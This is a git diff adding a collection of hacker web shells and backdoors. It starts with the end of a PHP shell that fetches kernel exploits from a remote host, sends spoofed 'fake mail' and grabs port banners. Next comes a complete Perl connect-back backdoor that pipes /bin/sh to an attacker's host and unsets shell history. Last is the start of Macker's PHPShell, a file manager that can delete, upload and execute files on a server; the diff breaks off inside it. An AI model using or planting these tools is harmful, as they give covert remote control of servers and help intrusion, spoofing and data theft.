+    if (!empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Linux Local Kernel Exploit Was Successfuly Copied</DIV>";
+    } else {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Kernel Exploit</DIV>";
+    }
+  }
+
+?>
+</CENTER>
+<pre><font face="Tahoma" size="2">
+<?php
+
+// Function to Visualize Source Code files 
+if ($see != "") {
+  $fp = fopen($see, "r"); 
+  $read = fread($fp, 30000); 
+  echo "============== $see ================<br>";
+  echo "<textarea name=textarea cols=80 rows=15>"; 
+  echo "$read"; 
+  Echo "</textarea>"; 
+}
+
+// Function to Dowload Local Xploite Binary COde or Source Code
+
+if ($dx != "") {
+  $fp = @fopen("$hostxpl",r);
+  $fp2 = @fopen("$storage","w");
+  fwrite($fp2, "");
+  $fp1 = @fopen("$storage","a+");
+  for (;;) {
+    $read = @fread($fp, 4096);
+    if (empty($read)) break;
+    $ok = fwrite($fp1, $read);
+    
+    if (empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Uploading File</DIV>";
+      break;
+    }
+  }
+
+  if (!empty($ok)) {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] File Was Successfuly Uploaded</DIV>";
+  }
+}
+
+flush( );
+
+// Function to visulize Format Color Source Code PHP
+
+if ($sfc != "") {
+  $showcode = show_source("$sfc");
+  echo "<font size=4> $showcode </font>";
+}
+
+// Function to Visualize all infomation files
+if ($fileinfo != "") {
+  $infofile = stat("$fileanalize");
+  while (list($info, $value) = each ($infofile)) {
+    echo" Info: $info  Value: $value <br>";
+  }
+}
+
+// Function to send fake mail
+if ($fake == 1) {
+  echo "<FORM METHOD=POST ACTION=\"$SCRIPT_NAME?$QUERY_STRING&send=1\">";
+  echo "Your Fake Mail <INPUT TYPE=\"\" NAME=\"yourmail\"><br>";
+  echo "Your Cavy:<INPUT TYPE=\"\" NAME=\"cavy\"><br>";
+  echo "Suject: <INPUT TYPE=\"text\" NAME=\"subject\"><br>";
+  echo "Text: <TEXTAREA NAME=\"body\" ROWS=\"\" COLS=\"\"></TEXTAREA><br>";
+  echo "<INPUT TYPE=\"hidden\" NAME=\"send\" VALUE=\"1\"><br>";
+  echo "<INPUT TYPE=\"submit\" VALUE=\"Send Fake Mail\">";
+  echo "</FORM>";
+}
+
+if($send == 1) {
+  if (mail($cavy, $subject, $body, "From: $yourmail\r\n")) {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Mail Send Sucessfuly</DIV>";
+  } else {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Sending Mail</DIV>";
+  }
+}
+
+if ($portscan != "") {
+  $port = array ("21","22","23","25","110",);
+  $values = count($port);
+  for ($cont=0; $cont < $values; $cont++) {
+    @$sock[$cont] = Fsockopen($SERVER_NAME, $port[$cont], $oi, $oi2, 1);
+    $service = Getservbyport($port[$cont],"tcp");
+    @$get = fgets($sock[$cont]);
+    echo "<br>Port: $port[$cont] - Service: $service<br><br>";
+    echo "<br>Banner: $get <br><br>";
+    flush();
+  }
+}
+
+?> 
+</font></pre>
\ No newline at end of file
diff --git a/xakep-shells/PHP/PHP Backdoor Connect.pl.php.txt b/xakep-shells/PHP/PHP Backdoor Connect.pl.php.txt
new file mode 100644
index 0000000..2e34ca1
--- /dev/null
+++ b/xakep-shells/PHP/PHP Backdoor Connect.pl.php.txt	
@@ -0,0 +1,61 @@
+#!/usr/bin/perl
+use IO::Socket;
+#IRAN HACKERS SABOTAGE Connect Back Shell          
+#code by:LorD
+#We Are :LorD-C0d3r-NT                                           
+#Email:LorD@ihsteam.com
+#
+#lord@SlackwareLinux:/home/programing$ perl dc.pl
+#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
+#
+#Usage: dc.pl [Host] [Port]
+#
+#Ex: dc.pl 127.0.0.1 2121
+#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
+#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
+#
+#[*] Resolving HostName
+#[*] Connecting... 127.0.0.1
+#[*] Spawning Shell
+#[*] Connected to remote host
+
+#bash-2.05b# nc -vv -l -p 2121
+#listening on [any] 2121 ...
+#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
+#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
+#
+#--==Systeminfo==--
+#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
+#
+#--==Userinfo==--
+#uid=1001(lord) gid=100(users) groups=100(users)
+#
+#--==Directory==--
+#/root
+#
+#--==Shell==--
+#
+$system    = '/bin/sh';
+$ARGC=@ARGV;
+print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
+if ($ARGC!=2) {
+   print "Usage: $0 [Host] [Port] \n\n";
+   die "Ex: $0 127.0.0.1 2121 \n";
+}
+use Socket;
+use FileHandle;
+socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
+connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
+print "[*] Resolving HostName\n";
+print "[*] Connecting... $ARGV[0] \n";
+print "[*] Spawning Shell \n";
+print "[*] Connected to remote host \n";
+SOCKET->autoflush();
+open(STDIN, ">&SOCKET");
+open(STDOUT,">&SOCKET");
+open(STDERR,">&SOCKET");
+print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n";
+system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
+echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
+system($system);
+#EOF
\ No newline at end of file
diff --git a/xakep-shells/PHP/PHP Shell.php.php.txt b/xakep-shells/PHP/PHP Shell.php.php.txt
new file mode 100644
index 0000000..0b1f12b
--- /dev/null
+++ b/xakep-shells/PHP/PHP Shell.php.php.txt	
@@ -0,0 +1,1010 @@
+<?php 
+
+/*
+*****************************************************************************************
+*                           PHPSHELL.PHP  BY MACKER     August 28th 2003                *
+***************************************************************************************** 
+*                                                                                       *  
+*   Welcome to Macker's PHPShell script...                                              * 
+*   This script will allow you to browse webservers etc...                              * 
+*   Just copy the file to your directory and open it in your Internet Browser.          * 
+*                                                                                       * 
+*   The webserver should support PHP...                                                 * 
+*                                                                                       * 
+*   You can modify the script if you want, but please send me a copy to:                *  
+*                               DRAZZ01@HOTMAIL.COM                                     * 
+***************************************************************************************** 
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+!!   PLEASE NOTE: You should use this script at own risk, it should do damage to the   !! 
+!!                Sites or even the server... You are responsible for your own deeds.  !! 
+!!                The admin of your webserver should always know you are using this    !!
+!!                script.                                                              !! 
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+*/ 
+
+
+/*Setting some envirionment variables...*/ 
+
+/* I added this to ensure the script will run correctly...
+   Please enter the Script's filename in this variable. */   
+$SFileName=$PHP_SELF;
+
+/* uncomment the two following variables if you want to use http
+   authentication. This will password protect your PHPShell */
+//$http_auth_user = "phpshell";	/* HTTP Authorisation username, uncomment if you want to use this */
+//$http_auth_pass = "phpshell";	/* HTTP Authorisation password, uncomment if you want to use this */	    
+
+error_reporting(0);
+$PHPVer=phpversion();
+$isGoodver=(intval($PHPVer[0])>=4);
+$scriptTitle = "PHPShell";
+$scriptident = "$scriptTitle by Macker";
+
+$urlAdd = "";
+$formAdd = "";
+
+function walkArray($array){
+  while (list($key, $data) = each($array))
+    if (is_array($data)) { walkArray($data); }
+    else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
+}
+
+if (isset($_PUT)) walkArray($_PUT);
+if (isset($_GET)) walkArray($_GET);
+if (isset($_POST)) walkArray($_POST);
+
+
+$pos = strpos($urlAdd, "s=r");
+if (strval($pos) != "") {
+$urlAdd= substr($urlAdd, 0, $pos);
+}
+
+$urlAdd .= "&s=r&";
+
+if (empty($Pmax))
+	$Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
+if (empty($Pidx)) 
+	$Pidx = 0;
+
+$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
+$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+
+$scriptdate = "August 28th 2003";
+$scriptver = "Version 2.6.6dev";
+$LOCAL_IMAGE_DIR = "img";
+$REMOTE_IMAGE_URL = "img";
+$img = array(
+				"Edit" 		=> "edit.gif",
+				"Download" 	=> "download.gif",
+				"Upload" 	=> "upload.gif",
+				"Delete" 	=> "delete.gif",
+				"View" 		=> "view.gif",
+				"Rename" 	=> "rename.gif",
+				"Move" 		=> "move.gif",
+				"Copy" 		=> "copy.gif",
+				"Execute" 	=> "exec.gif"
+            );
+
+while (list($id, $im)=each($img))
+	if (file_exists("$LOCAL_IMAGE_DIR/$im"))
+		$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
+	else
+ 		$img[$id] = "[$id]";
+
+
+
+
+/* HTTP AUTHENTICATION */
+
+    if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
+	    setcookie("noauth","");
+	    Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
+	    Header( "HTTP/1.0  401  Unauthorized");
+	    echo "Your username or password is incorrect";
+	    exit ;
+			     
+    } 
+
+function buildUrl($display, $url) {
+        global $urlAdd;
+        $url = $SFileName . "?$urlAdd$url";
+	return "<a href=\"$url\">$display</a>";
+}
+
+function sp($mp) {
+	for ( $i = 0; $i < $mp; $i++ )
+		$ret .= "&nbsp;";
+	return $ret;
+}
+
+function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  } 
+
+function Mydeldir($Fdir) {
+	if (is_dir($Fdir)) {
+		$Fh=@opendir($Fdir);
+ 		while ($Fbuf = readdir($Fh))
+ 			if (($Fbuf != ".") && ($Fbuf != ".."))
+				Mydeldir("$Fdir/$Fbuf");
+		@closedir($Fh);
+				return rmdir($Fdir);
+	}	else {
+		return unlink($Fdir);
+	}
+}
+
+
+function arrval ($array) {
+list($key, $data) = $array;
+return $data;
+}
+
+function formatsize($insize) {  
+	$size = $insize;
+	$add = "B";
+	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "KB";
+ 	}
+ 	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "MB";
+ 	}
+ 	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "GB";
+ 	}
+ 	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "TB";
+ 	}
+ 	return "$size $add";
+}
+
+if ($cmd != "downl") {
+	?>
+
+<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
+<HTML>
+ <HEAD>
+  <STYLE>
+  <!--
+    A{ text-decoration:none; color:navy; font-size: 12px }
+    body { font-size: 12px; 
+           font-family: arial, helvetica;
+            scrollbar-width: 5;
+            scrollbar-height: 5;
+            scrollbar-face-color: white;
+            scrollbar-shadow-color: silver;
+            scrollbar-highlight-color: white;
+            scrollbar-3dlight-color:silver;
+            scrollbar-darkshadow-color: silver;
+            scrollbar-track-color: white;
+            scrollbar-arrow-color: black;
+    }
+    Table { font-size: 12px; }
+    TR{ font-size: 12px; }
+    TD{ font-size: 12px; 
+        font-family: arial, helvetical;
+        BORDER-LEFT: black 0px solid; 
+	BORDER-RIGHT: black 0px solid; 
+	BORDER-TOP: black 0px solid; 
+	BORDER-BOTTOM: black 0px solid; 
+	COLOR: black; 
+    }
+    .border{       BORDER-LEFT: black 1px solid;
+ 		   BORDER-RIGHT: black 1px solid;
+ 		   BORDER-TOP: black 1px solid;
+ 		   BORDER-BOTTOM: black 1px solid;
+ 		 }
+    .none  {       BORDER-LEFT: black 0px solid;
+ 		   BORDER-RIGHT: black 0px solid;
+ 		   BORDER-TOP: black 0px solid;
+ 		   BORDER-BOTTOM: black 0px solid;
+ 		 }
+    .inputtext {
+		    background-color: #EFEFEF;
+		    font-family: arial, helvetica;
+		    border: 1px solid #000000;
+		    height: 20;
+    }
+    .lighttd {       background: #F8F8F8;
+    }
+    .darktd {        background: #E8E8E8;
+    }
+    input { font-family: arial, helvetica;
+    }
+    .inputbutton {
+                        background-color: silver;
+			border: 1px solid #000000;
+			border-width: 1px;
+			height: 20;
+    }
+    .inputtextarea {
+		    background-color: #EFEFEF;
+		    border: 1px solid #000000;
+		    scrollbar-width: 5;
+		    scrollbar-height: 5;
+		    scrollbar-face-color: #EFEFEF;
+		    scrollbar-shadow-color: silver;
+		    scrollbar-highlight-color: #EFEFEF;
+		    scrollbar-3dlight-color:silver;
+		    scrollbar-darkshadow-color: silver;
+		    scrollbar-track-color: #EFEFEF;
+		    scrollbar-arrow-color: black;
+    }
+    .top { BORDER-TOP: black 1px solid; }
+    .textin { BORDER-LEFT: silver 1px solid;
+              BORDER-RIGHT: silver 1px solid;
+ 	      BORDER-TOP: silver 1px solid;
+              BORDER-BOTTOM: silver 1px solid;
+              width: 99%; font-size: 12px; font-weight: bold; color: navy;
+            }
+    .notop { BORDER-TOP: black 0px solid; }
+    .bottom { BORDER-BOTTOM: black 1px solid; }
+    .nobottom { BORDER-BOTTOM: black 0px solid; }
+    .left { BORDER-LEFT: black 1px solid; }
+    .noleft { BORDER-LEFT: black 0px solid; }
+    .right { BORDER-RIGHT: black 1px solid; }
+    .noright { BORDER-RIGHT: black 0px solid; }
+    .silver{ BACKGROUND: silver; }
+  -->
+  </STYLE>
+  <TITLE><?php echo $SFileName ?></TITLE>
+ </HEAD>
+ <body topmargin="0" leftmargin="0">
+ <div style="position: absolute; background: white; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
+ <table width=100% height="100%" NOWRAP border="0">
+  <tr NOWRAP>
+   <td width="100%" NOWRAP>
+    <table NOWRAP width=100% border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="silver border">
+       <center>
+	    <strong>
+		 <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font>
+            </strong>
+       </center>
+      </td>
+     </tr>
+    </table><br>
+
+	<?php
+}
+
+if ( $cmd=="dir" ) {
+  	$h=@opendir($dir);
+ 	if ($h == false) {
+  		echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
+                COULD NOT OPEN THIS DIRECTORY!!!<br>".sp(3)."\n
+                THE SCRIPT WILL RESULT IN AN ERROR!!!
+                <br><br>".sp(3)."\n
+                PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...
+                <br><br></font>\n\n\n\n";
+ 	}
+        if (function_exists('realpath')) {
+		$partdir = realpath($dir);
+	}
+        else {
+		$partdir = $dir;
+	}
+ 	if (strlen($partdir) >= 100) {
+ 		$partdir = substr($partdir, -100);
+ 		$pos = strpos($partdir, "/");
+ 		if (strval($pos) != "") {
+ 			$partdir = "<--   ...".substr($partdir, $pos);
+ 		}
+        $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
+        $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
+	$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+ 	}
+    ?>
+      <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
+         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
+	  <tr>
+	   <td width="100%" class="silver border">
+	    <center>&nbsp;HAXPLORER - Server Files Browser...&nbsp;</center>
+	   </td>
+	  </tr>
+	 </table>
+       <br>
+	 <table width="100%" border="0" cellpadding="0" cellspacing="0">
+	  <tr>
+           <td class="border nobottom noright">
+            &nbsp;Browsing:&nbsp;
+	  </td>
+          <td width="100%" class="border nobottom noleft">
+   	    <table width="100%" border="0" cellpadding="1" cellspacing="0">
+             <tr>
+              <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
+              <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GO<b></a>&nbsp;<center></td>
+             </tr>
+            </table>
+            
+	  </td>
+	 </tr>
+	</table>
+  <!--    </form>   -->
+        <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
+         <tr>
+	  <td width="100%" NOWRAP class="silver border">
+	   &nbsp;Filename&nbsp;
+	  </td>
+          <td NOWRAP class="silver border noleft">
+	   &nbsp;Actions&nbsp;(Attempt to perform)&nbsp;
+	  </td>
+          <td NOWRAP class="silver border noleft">
+	   &nbsp;Size&nbsp;
+	  </td>
+          <td width=1 NOWRAP class="silver border noleft">
+	   &nbsp;Attributes&nbsp;
+	  </td>
+          <td NOWRAP class="silver border noleft">
+	   &nbsp;Modification Date&nbsp;
+	  </td>
+	 <tr>
+    <?php
+
+
+      	/* <!-- This whole heap of junk is the sorting section... */
+
+ 	$dirn 	= array();
+ 	$filen 	= array();
+ 	$filesizes	= 0;
+ 	while ($buf = readdir($h)) {
+	    if (is_dir("$dir/$buf"))
+			$dirn[] = $buf;
+    		else 
+ 			$filen[] = $buf;
+    	}	 	
+		$dirno 	= count($dirn) + 1;
+ 		$fileno	= count($filen) + 1;
+
+  		function mycmp($a, $b){
+			if ($a == $b) return 0;
+			return (strtolower($a) < strtolower($b)) ? -1 : 1;
+		}
+
+		if (function_exists("usort")) {
+			usort($dirn, "mycmp");
+			usort($filen, "mycmp");
+		}
+		else {
+			sort ($dirn);
+	 		sort ($filen);
+	 	}
+	reset ($dirn);
+ 	reset ($filen);
+ 	if (function_exists('array_merge')) {
+		$filelist = array_merge ($dirn, $filen);
+	}
+ 	else {
+		$filelist = $dirn + $filen;
+	}
+
+	
+	if ( count($filelist)-1 > $Pmax ) {
+		$from = $Pidx * $Pmax;
+		$to = ($Pidx + 1) * $Pmax-1;
+		if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
+			$to = count($filelist) - 1;
+		if ($to > count($filelist)-1)
+			$to = count($filelist)-1;
+		$Dcontents = array();
+		For ($Fi = $from; $Fi <= $to; $Fi++) {
+			$Dcontents[] = $filelist[$Fi];	
+		}
+
+	}
+	else {
+		$Dcontents = $filelist;
+	}
+	
+     $tdcolors = array("lighttd", "darktd");
+
+     while (list ($key, $file) = each ($Dcontents)) {
+          if (!$tdcolor=arrval(each($tdcolors))) {
+	    reset($tdcolors);
+	    $tdcolor = arrval(each($tdcolors));	  }
+	  	         
+ 		if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
+          			/* <!-- Dirname --> */
+			echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
+  				/* <!-- Actions --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
+ 				/* <!-- Rename --> */
+			if ( ($file != ".") && ($file != "..") )
+				echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+ 				/* <!-- Delete --> */
+			if ( ($file != ".") && ($file != "..") )
+				echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+				/* <!-- End of Actions --> */
+			echo "&nbsp;&nbsp;</center></td>\n";
+  				/* <!-- Size --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
+ 				/* <!-- Attributes --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+ 			echo "<strong>D</strong>";
+		        if ( @is_readable("$dir/$file") ) {
+   				echo "<strong>R</strong>";
+ 			}
+ 			if (function_exists('is_writeable')) {
+				if ( @is_writeable("$dir/$file") ) {
+ 					echo "<strong>W</stong>";
+ 				}
+			}
+ 			else {
+    				echo "<strong>(W)</stong>";
+  			}
+  			if ( @is_executable("$dir/$file") ) {
+ 				echo "<Strong>X<strong>";
+ 			}
+ 			echo "&nbsp;&nbsp;</td>\n";
+ 				/* <!-- Date --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+ 			echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+ 			echo "</td>";
+			echo "</tr>\n";
+
+        	}
+  		else { /* <!-- Then it must be a File... --> */
+     				/* <!-- Filename --> */
+			if ( @is_readable("$dir/$file") )
+ 				echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
+  			else
+  				echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
+  			   				/* <!-- Actions --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
+ 				/* <!-- Rename --> */
+			echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+  				/* <!-- Edit --> */
+			if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+ 				echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
+   				/* <!-- Copy --> */
+ 			echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
+  				/* <!-- Move --> */
+			if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+ 					echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
+    				/* <!-- Delete --> */
+			echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+ 				/* <!-- Download --> */
+			echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
+ 				/* <!-- Execute --> */
+			if ( @is_executable("$dir/$file") )
+ 				echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
+    				/* <!-- End of Actions --> */
+			echo sp(2)."</center></td>\n";
+ 				/* <!-- Size --> */
+			echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
+ 			$size = @filesize("$dir/$file");
+ 			If ($size != false) {
+			        $filesizes += $size;
+				echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
+			}
+			else
+				echo "&nbsp;&nbsp;<strong>0 B<strong>";
+ 			echo "&nbsp;&nbsp;</td>\n";
+
+ 				/* <!-- Attributes --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+
+ 			if ( @is_readable("$dir/$file") )
+ 				echo "<strong>R</strong>";
+   			if ( @is_writeable("$dir/$file") )
+ 				echo "<strong>W</stong>";
+   			if ( @is_executable("$dir/$file") )
+ 				echo "<Strong>X<strong>";
+   			if (function_exists('is_uploaded_file')){
+ 				if ( @is_uploaded_file("$dir/$file") )
+ 					echo "<Strong>U<strong>";
+ 			}
+ 			else {
+				echo "<Strong>(U)<strong>";
+			}
+ 			echo "&nbsp;&nbsp;</td>\n";
+			 	/* <!-- Date --> */
+			echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+ 			echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+ 			echo "</td>";
+ 			echo "</tr>\n";
+ 		}
+  	}
+
+    	echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
+  	echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Dir(s),&nbsp;".@count ($filen)."&nbsp;File(s)&nbsp;&nbsp;\n";
+  	echo "</td><td NOWRAP class=\"silver border noleft\">\n";
+  	echo "&nbsp;&nbsp;Total filesize:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
+	
+	function printpagelink($a, $b, $link = ""){
+		if ($link != "") 
+			echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
+		else
+			echo "<b>| $a - $b |</b>";
+	}
+        
+	if ( count($filelist)-1 > $Pmax ) {
+		echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
+		$Fi = 0;
+		while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
+			$from = $Fi*$Pmax;
+			while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+			$to = ($Fi + 1) * $Pmax - 1;
+			if ($Fi == $Pidx)
+				$link="";
+			else 
+				$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+			printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
+			echo "&nbsp;&nbsp;&nbsp;";
+			$Fi++;
+		}
+		$from = $Fi*$Pmax;
+		while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+		$to = count($filelist)-1;
+		if ($Fi == $Pidx)
+			$link="";
+		else 
+			$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+		printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);		
+		
+	
+		echo "</center></td></tr></table></td></tr>";
+	}
+
+
+    	echo "</table>\n<br><table NOWRAP>";
+
+  	if ($isGoodver) {
+		echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
+	}
+ 	else {
+		echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
+	}
+      		/* <!-- Other Actions --> */
+   	echo "<tr><td class=\"silver border\">&nbsp;<strong>Other actions:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
+  	echo "<td>&nbsp;<b>".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+	                     buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+			     buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
+    	echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
+  	echo "<tr><td class=\"silver border\">&nbsp;<strong>Your IP:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
+  	echo "<tr><td class=\"silver border\">&nbsp;<strong>Browsing Directory:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
+  	echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Legend:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
+  	echo "<table NOWRAP>";
+        echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Directory.</td></tr>\n";
+   	echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Readable.</td></tr>\n";
+  	echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Writeable.</td></tr>\n";
+  	echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Executable.</td></tr>\n";
+  	echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
+  	echo "</table></td>";
+ 	echo "</table>";
+ 	echo "<br>";
+     	@closedir($h);
+  }
+  elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
+ 	echo system("$file");
+ }
+elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
+	echo "<center><table><tr><td NOWRAP>" ;
+ 	if ($auth == "yes") {
+		if (Mydeldir($file)==false) {
+ 			echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
+  		}
+ 		else {
+ 			echo "Successfully removed \"$file\"<br>";
+ 		}
+ 		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
+	}
+ 	else {
+		echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
